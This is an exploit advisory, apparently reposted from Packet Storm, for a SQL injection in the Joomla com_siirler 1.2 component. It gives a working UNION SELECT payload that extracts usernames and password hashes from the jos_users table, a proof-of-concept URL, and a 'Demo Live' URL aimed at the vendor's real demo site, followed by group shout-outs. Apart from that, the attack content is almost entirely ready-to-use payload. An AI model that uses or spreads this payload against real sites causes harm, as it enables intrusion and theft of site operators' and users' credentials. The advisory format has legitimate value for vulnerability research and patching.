The Joomla Siirler component version 1.2 suffers from a remote SQL injection vulnerability.
c8a8be68de0e64f96e44e68f1421d598f3bbc55567a667e8d48d1c5e5f7be8f0+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| |
| Joomla <= 1.5.x Component com_siirler 1.2 (sid) SQL Injection Vulnerability |
| |
| |
| =================[Author]================== |
| |
| [+] Founded : v3n0m |
| [+] Contact : v3n0m666[at]live[dot]com |
| [+] Blog : http://0wnage.wordpress.com/ |
| [+] Group : YOGYACARDERLINK |
| [+] Site : http://yogyacarderlink.web.id/ |
| [+] Date : August, 25th 2009 [INDONESIA] |
| |
| ================[Soft Info]================ |
| |
| Software: Siirler Bileseni |
| Version : 1.2 RC (Legacy) |
| Vendor : http://www.qproje.com/ |
| License : GNU/GPL |
| |
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Exploit:
[+] +and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
[-] SQLi p0c:
[+] http://localhost/[path]/index.php?option=com_siirler&task=sdetay&sid=[xxx]+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
[xxx] = Valid sid number
[+] Demo Live:
[-] http://demo.qproje.com/j15x/index.php?option=com_siirler&task=sdetay&sid=364+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
===========================
[+] Greetz & Thanks [+]
===========================
RedLine Crew : Bang Musa,Mas Andre,Dagol,Yazid,Ogie
YOGYACARDERLINK : leQhi,lingah,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,
aRiee,yoga0400,ghareng,eidelweiss,pKi,kaka11
g0t inspiration in my bedroom when i was flashback my mind about jogja & jovita
PROUD TO BE INDONESIAN-
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed